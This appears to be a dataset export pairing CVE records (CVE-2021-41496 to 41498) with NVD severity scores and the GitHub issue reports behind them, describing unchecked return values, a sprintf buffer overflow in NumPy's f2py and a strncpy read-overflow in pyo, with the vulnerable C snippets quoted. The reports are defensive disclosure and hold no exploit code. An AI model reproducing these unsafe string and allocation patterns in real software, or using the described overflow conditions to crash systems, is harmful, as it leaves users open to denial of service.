newdescr->c_metadata = NPY_AUXDATA_CLONE(base->c_metadata);
if (newdescr->c_metadata == NULL) {
PyErr_NoMemory();
/* TODO: This seems wrong, as the old fields get decref'd? */
Py_DECREF(newdescr);
return NULL; ----------------> **point 2**
}
}
........
if (newdescr->subarray) {
newdescr->subarray = PyArray_malloc(sizeof(PyArray_ArrayDescr));
if (newdescr->subarray == NULL) {
Py_DECREF(newdescr);
return (PyArray_Descr *)PyErr_NoMemory(); ----------------> **point 3**
}
}
.........
return newdescr;
}
```
#### Call-site example for PyArray_DescrNew
```
NPY_NO_EXPORT PyArray_Descr *
PyArray_DescrNewByteorder(PyArray_Descr *self, char newendian)
{
PyArray_Descr *new;
char endian;
new = PyArray_DescrNew(self);
endian = new->byteorder; -----> direct read through "new“
......
}
```
### Error message:
At most call-sites for PyArray_DescrNew, there are no validations of its return,
but an invalid address may be returned.
[example](https://github.com/Daybreak2019/IssueReport/blob/master/Numpy/case-11471/11471.png)
### NumPy/Python version information:
the main branch
| Missing return-value validation of the function PyArray_DescrNew | https://api.github.com/repos/numpy/numpy/issues/19038/comments | 35 | 2021-05-19T06:21:52Z | 2024-05-05T07:36:09Z | https://github.com/numpy/numpy/issues/19038 | 895,036,753 | 19,038 | 2,875 |
CVE-2021-41496 | 2021-12-17T20:15:08.517 | Buffer overflow in the array_from_pyobj function of fortranobject.c in NumPy < 1.19, which allows attackers to conduct a Denial of Service attacks by carefully constructing an array with negative values. NOTE: The vendor does not agree this is a vulnerability; the negative dimensions can only be created by an already privileged user (or internally) | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/numpy/numpy/issues/19000"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/numpy/numpy/issues/19000"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:numpy:numpy:*:*:*:*:*:*:*:*",
"matchCriteriaId": "341472C4-4DBC-4F3D-B672-5F1C58D5A2C3",
"versionEndExcluding": "1.19.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/numpy/numpy/issues/19000 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"numpy",
"numpy"
] | <!-- Please describe the issue in detail here, and fill in the fields below -->
### Reproducing code example:
**Snippet**:
``` c
char mess[200];
if ((intent & F2PY_INTENT_HIDE)
|| ((intent & F2PY_INTENT_CACHE) && (obj==Py_None))
|| ((intent & F2PY_OPTIONAL) && (obj==Py_None))
) {
/* intent(cache), optional, intent(hide) */
if (count_negative_dimensions(rank,dims) > 0) {
int i;
strcpy(mess, "failed to create intent(cache|hide)|optional array"
"-- must have defined dimensions but got ("); ----> 91 chars copied into mess
for(i=0;i<rank;++i)
sprintf(mess+strlen(mess),"%" NPY_INTP_FMT ",",dims[i]); ----> max of rank is F2PY_MAX_DIMS (40), and all values of dims could be -1. Given the format "%d," ("-1,"), max length of this part could be 40*3=120 + 91 > 200
strcat(mess, ")");
PyErr_SetString(PyExc_ValueError,mess);
return NULL;
}
arr = (PyArrayObject *)
PyArray_New(&PyArray_Type, rank, dims, type_num,
NULL,NULL,1,
!(intent&F2PY_INTENT_C),
NULL);
if (arr==NULL) return NULL;
if (!(intent & F2PY_INTENT_CACHE))
PyArray_FILLWBYTE(arr, 0);
return arr;
}
```
### Error message:
**File**: numpy/f2py/src/fortranobject.c
**Function**: array_from_pyobj (line 724 : 733)
**Optional call-path**: External -> fortran_setattr -> array_from_pyobj
**Details** in [description](https://github.com/Daybreak2019/IssueReport/blob/master/Numpy/case-10031/10031.png)
When we run our analysis tool on NumPy, a few Inappropriate string operations are reported at call sites of function strcpy, sprintf, and strcat in array_from_pyobj. There are no boundary checks at these points despite "mess" seems large enough to ensure the operations safe except for the point shown above.
As a suggestion, it is better to replace these functions with strncpy, strncat, and snprintf.
### NumPy/Python version information:
the main branch of NumPy
| Potential buffer-overflow from string operations in function array_from_pyobj of fortranobject.c | https://api.github.com/repos/numpy/numpy/issues/19000/comments | 7 | 2021-05-13T04:05:51Z | 2021-12-20T18:44:25Z | https://github.com/numpy/numpy/issues/19000 | 890,679,610 | 19,000 | 2,876 |
CVE-2021-41497 | 2021-12-17T21:15:07.663 | Null pointer reference in CMS_Conservative_increment_obj in RaRe-Technologies bounter version 1.01 and 1.10, allows attackers to conduct Denial of Service attacks by inputting a huge width of hash bucket. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/RaRe-Technologies/bounter/issues/47"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/RaRe-Technologies/bounter/issues/47"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:rare-technologies:bounter:1.01:*:*:*:*:*:*:*",
"matchCriteriaId": "97749749-BC7E-461C-B354-42776E293477",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:rare-technologies:bounter:1.10:*:*:*:*:*:*:*",
"matchCriteriaId": "A0F5AFF5-348D-4C38-8318-44DCC8E04EBB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/RaRe-Technologies/bounter/issues/47 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"RaRe-Technologies",
"bounter"
] | <!--
If your issue is a usage or a general question, please submit it here instead:
- Mailing List: https://groups.google.com/forum/#!forum/gensim
-->
<!-- Instructions For Filing a Bug: https://github.com/RaRe-Technologies/gensim/blob/develop/CONTRIBUTING.md -->
#### Description
In CMS_Conservative_init, w is received from Python code.
Its size is not validated hence "self->table[i] = (CMS_CELL_TYPE *) calloc(self->width, sizeof(CMS_CELL_TYPE));" may fail , which cause the Null pointer.
self->table[i] would be accessed in CMS_Conservative_increment_obj, which make the Python crash down.
#### Steps/Code/Corpus to Reproduce
```
static int
CMS_VARIANT(_init)(CMS_TYPE *self, PyObject *args, PyObject *kwds)
{
.........................
for (i = 0; i < self->depth; i++)
{
self->table[i] = (CMS_CELL_TYPE *) calloc(self->width, sizeof(CMS_CELL_TYPE));
printf ("[%d]self->table[%d] = %p \r\n", i, i, self->table[i]);
}
...........................
```
**Optional call-path**: increment -> CMS_Log1024_increment -> CMS_Conservative_increment_obj
#### Expected Results
when w is set as an arbitrary number, Python can not crash down.
#### Actual Results
crash
#### Versions
the main branch
<!-- Thanks for contributing! --> | Potential Null pointer access in CMS_Conservative_increment_obj | https://api.github.com/repos/piskvorky/bounter/issues/47/comments | 3 | 2021-05-14T08:12:08Z | 2022-01-13T14:22:24Z | https://github.com/piskvorky/bounter/issues/47 | 891,716,851 | 47 | 2,877 |
CVE-2021-41498 | 2021-12-17T21:15:07.700 | Buffer overflow in ajaxsoundstudio.com Pyo < and 1.03 in the Server_jack_init function. which allows attackers to conduct Denial of Service attacks by arbitrary constructing a overlong server name. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/belangeo/pyo/issues/221"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/belangeo/pyo/issues/221"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pyo_project:pyo:1.03:*:*:*:*:*:*:*",
"matchCriteriaId": "6A572C53-4ECF-4631-AEA3-F3E41ED3FC45",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/belangeo/pyo/issues/221 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"belangeo",
"pyo"
] | ### Code snippet
```
Server_jack_init(Server *self)
{
int i = 0;
char client_name[32]; -----------> No initialization
char name[16];
.........
strncpy(client_name, self->serverName, 31); -------------> when length of self->serverName is 31, client_name may has no terminator. It is a risk of read-overflow.
.........
}
```
### Description
**Function**: Server_jack_init
**File**: ad_jack.c
**Call-path**: boot (Python) -> Server_boot -> Server_jack_init
**WarningType**: read-overflow. Our analysis tool reported a warning at the call-site of strncpy. As client_name is not initialized, it may has no terminator after strncpy hence to cases read-overflow.
Also seen in [Details](https://github.com/Daybreak2019/IssueReport/blob/master/Pyo/case-023.png)
| Missing a terminator after strncpy in function Server_jack_init, which may cause read-overflow | https://api.github.com/repos/belangeo/pyo/issues/221/comments | 4 | 2021-05-27T06:00:51Z | 2021-06-14T00:45:02Z | https://github.com/belangeo/pyo/issues/221 | 903,252,644 | 221 | 2,878 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.